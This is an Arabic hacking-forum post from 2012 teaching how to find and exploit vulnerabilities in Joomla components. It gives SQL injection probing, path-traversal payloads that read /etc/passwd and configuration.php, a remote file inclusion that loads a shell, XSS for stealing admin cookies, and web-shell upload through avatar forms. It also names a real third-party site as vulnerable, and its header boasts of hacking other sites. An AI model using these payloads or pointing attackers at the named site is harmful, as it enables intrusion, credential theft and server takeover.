1. المٌقدمة الأولي :دورة إختبار ثغرات حقن قواعد البيانات SQLI الإحترافية لعام 2017 عام 2018
    تٌعد ثغرات حقن قواعد البينات الثغرة رقم واحد فى العالم والمصنفة تحت بند الإخطر
    والفريق التابع له بإختراق أكبر المواقع الصهيونية قرائة الموضوع
  2. المٌقدمة الثانية : دورة إختبار ثغرات حقن قواعد البيانات SQLI الإحترافية لعام 2017 عام 2018
    في هذه المٌثقدمة الثانية والأخيرة سوف نتعرف على قواعد علم حقن قواعد البيانات
    حتى يتثنى لنا علم يٌساعدنا على القيام بعمليات الحقن بالطرق الصحيحه قرائة الموضوع
  3. دورة كشف دمج والتلغيم حصريا على أرض عراق تيم(2017)
    بعد ماقمت بعمل دورة الكشف دمج والتلغيم وستكملت الدوره وتحتوي على 12 درس
    كانت دروس حصريا على عراق تيم وشرح واضح جدا ومفهوم الى المبتدأ والى المبدع قرائة الموضوع

شرح شرح اكتشاف ثغرات فيJoomla Compon3nts

الموضوع في 'الـقـسـم الـعـام' بواسطة .:: RSS ::., بتاريخ ‏27 سبتمبر 2012.

كاتب الموضوع : .:: RSS ::. المشاهدات : 1,161 الردود : 0 ‏27 سبتمبر 2012
حالة الموضوع:
مغلق
  1. غير متصل

    .:: RSS ::. عضوية آلية

    عضو منذ:
    ‏9 سبتمبر 2011
    عدد المشاركات:
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:
    الإقامة:


    السلام عليكم و رحمة الله تعالى وبركاته .
    تسجلت في مجتمع الهكر الاخلاقي . حبيت اخلي اول مشاركة مضوع |1|

    اليوم معي شرح خفيف حول اكتشاف الثغرات في جوملا .

    -ما هي الملحقات ؟

    من اجل البدأ يجب عليك تنصيب جوملا في السيرفر الشخصي . بعدها ادخل للوحة و اضف روابط للملحق
    للاضافات التي تريد و لكي تضهر روابط على هذا الشكل
    localhost/joomla/index.php?option=com_v4&Item=1&itemid=11
    روح على
    Administration =>Menus=>Gestion des menus=>nouveau

    index.php?option= هذي دورها االاتصال بالملحق او استدعائه
    com_v4 = اسم الملحق
    itemid=11 و Item=1 = هاذو معرف سوف نتكلم عنهم لاحقا .
    طبعا الان لديك رسم او فكرة عن روايط الجملة بشكل عام . الامر الذي سيساعدك في المراحل القادمة .
    طيب بعد المقدمة نتحدث عن اختراق الجوملا .
    سنتحدث عن 4 انواع من الثغرات و هي
    SQL Injection و Local File Include و Remote File include و Xss و Upload.
    االاشياء التي يجب الانتباه البها اثناء الاختراق هي كالتالي :
    الفورمز او المدخلات و هي مثل مربع البحث او التعليق الخ ...
    - بارامترات الروابط مثل id و controller و cat و page الخ
    نبدا على بركة الله .

    1 - SQL INJECTION

    هذا النوع من الثغرات هو الاكثر انتشارا في الجوملا .
    مثال على رابط مصاب بالسكيول :
    index.php?option=com_v4&cat=11&Item=1
    لبارامترات التي تكون مسؤولة عن الثغرة هي :
    cat , category , kat , id, kats , userid , catid , cats,Item, entry, page,Itemid , categories
    و هناك بارامترات اخرى . . .
    طبعا اكتشاف هل البارامتر مصاب او لا هذا امر معروف فقط تقوم باضافة ' .
    لكي تفهمو اكثر . خلينا نشوف ثغرات .
    index.php?option=com_peliculas&view=peliculas&id=n ull[Sql Injection]
    هنا الملحق المصاب هو piliculas و البارمترالمصاب id .

    مثال هذا الموقع مصاب http://www2.pasadizo.com/index.php?o...iculas&id=1807


    2 - Local File Include

    هذا النوع من الثغرات يسمح لك باستدعاء اي ملف بشرط ان يكون هذا الملف داخل الموقع .
    مثلا يمكنك من استعراض الكونفغ . او ملف /etc/passwd بدون مشاكل .

    ثغرات local file include هي الاخرى منتشرة بنسبة معينة في اضافات الجوملا .

    مثال على رابط مصاب local file include :
    index.php?option= com_v4 =2&view=lfi

    الباراميترات التي تسبب الاصابة بهذا النوع من الثغرات هي :
    - controller
    - view
    - layout
    - page

    امثلة :
    index.php?option= com_v4 =2&controller=lfi
    البارامتر المصاب :controller
    index.php?option= com_v4 =2&view=lfi
    البارامتر المصاب:view

    index.php?option= com_v4 =2&layout=lfi
    البارامتر المصاب: layout

    index.php?option= com_v4 =2&page=lfi
    البارامتر المصاب: page

    لو اريد استعراض ملف passwd مثلا .
    index.php?option=com_v4 &controller=../../../../etc/passwd%00

    في المثال السابق .. استعملنا البارامتر contorller في استدعاء ملف الباسوورد كمثال .
    لاستدعاء الكونفج راح بصير هيك .
    index.php?option=com_v4 &controller=../../../configuration.php
    طبعا كل هذي ملفات تحتوي على معلومات حساسة من شانها ان تتسبب في اختراق السيرفر .
    ملاحضة : هنا انا اشرح بدون تعمق فلو انت لا تعرف شيء
    روح راجع شرحات موجودة بكثرة على هذ النوع .

    3 - Remote File Include

    هذا النوع من الثغرات يسمح لك باستدعاء ملفات خارجية .
    مثال على رابط مصاب local file remote :
    index.php?option=com_v4 &Itemid=&mosConfig_abso lute_path=RFI
    البارامترات المصابة :
    mosConfig.absolute.path
    task
    يعني رابط مصاب راح يكون شكله مثل هذا :
    index.php?option=com_v4 &Itemid=&mosConfig.abso lute.path=rfi
    البارامتر المصاب : mosConfig.absolute.path
    طبعا اذا وجدت ملحق مصاب . حاول انك تستدعي شل . مثلا :
    index.php?option=com_v4team&Itemid=&mosConfig.abso lute.path=http://localhost/shell.txt?

    4 - xss

    النوع من هذا الثغرات له نوعان . واحد مخزن و الاخر لا .
    الفرق بينها هو ان المخزنة تخزن البيانات في قواعد البيانات . مما يجعلها خطيرة .
    اما الثانية فلا تخزن .
    لاكتشاف هذا النوع من الثغرات يجب عليك الانتباه للمدخلات .
    اقصد بالمدخلات مربعات البحث و مكان ادخال الردود الخ . . .
    فيمكنك وضع كود استعلام مثل a l e r t (12345)
    و اذا ضهرت نافذه مكتوب فبها 12345 يعني انه مصاب ..
    فائدة الثغرة هي انها تمكنك من سرقة كوكيز الادمن .
    اما اذا كانت مخزنة فيمكنك زرع كود تحويل الى اندكسك او صفحة ملغمة الخ ...

    5- upload

    هذه الثغرات عموما تمكنك من رفع شل بدون اي مشاكل .
    اكتشافها سهل . كل ما عليك هو ان تجد مركز رفع و تجرب رفع شل .
    عندما اقول مركز رفع فانا اقصد اي مكان يمكنك من خلاله ملفات .
    مثل رفع الصورة الشخصية فبدل الصورة جرب ان ترفع شل .
    ممكن تلاقي مشكل في ايجاد مسار نزول الملف . هناك طريقة جميلة كنت قد راتها في احد المنتديات
    وهي مثلا اذا كنت تشتغل في السيرفر الشخصي . ورفعت ملف 1.php لم تجد مسار نزوله ؟
    بكل بساطة ارجع للوندوس و اعمل بحث في ملف C:\AppServ\www عن 1.php و راح يجيب مساره ض1 .



    المصدر: شبكة عراق تيم IQ-TEAM - من قسم: |[ RSS Forum ]|

    avp h;jaht eyvhj tdJoomla Compon3nts​
     


    جاري تحميل الصفحة...
حالة الموضوع:
مغلق

مشاركة هذه الصفحة

جاري تحميل الصفحة...